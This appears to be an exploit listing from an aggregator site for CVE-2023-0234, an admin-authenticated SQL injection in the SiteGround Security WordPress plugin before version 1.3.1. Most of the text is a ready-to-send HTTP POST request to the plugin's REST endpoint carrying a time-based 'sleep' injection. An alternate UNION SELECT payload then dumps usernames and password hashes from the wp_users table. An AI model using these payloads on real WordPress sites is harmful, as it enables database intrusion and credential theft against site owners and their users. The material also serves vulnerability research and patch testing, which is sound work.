Exploit for SiteGround Security < 1.3.1 - Admin+ SQLi CVE-2023-0234

Name: Exploit for SiteGround Security < 1.3.1 - Admin+ SQLi CVE-2023-0234
Rating: 5 (21 reviews)

2023-01-13 | CVSS 0.6

## https://sploitus.com/exploit?id=WPEX-ID:ACF3E369-1290-4B3F-83BF-2209B9DD06E1
1:

POST /wordpress/index.php/wp-json/sg-security/v1/activity-registered HTTP/1.1
Host: YOUR HOST
X-WP-Nonce: YOUR NONCE
Cookie: [Admin+]
Content-Length: 155

{"limitedView":1,"filters":[{"wp_name":"user","children":[{"value":"1-sleep(3); #"}]}]}

2:

Alternate payload for extracting info from the wp_users table;

{"limitedView":1,"filters":[{"wp_name":"user","children":[{"value":"1 UNION SELECT 1,1,1,user_login,user_pass,1,1,1,1,1,1,1 FROM wp_users; #"}]}]}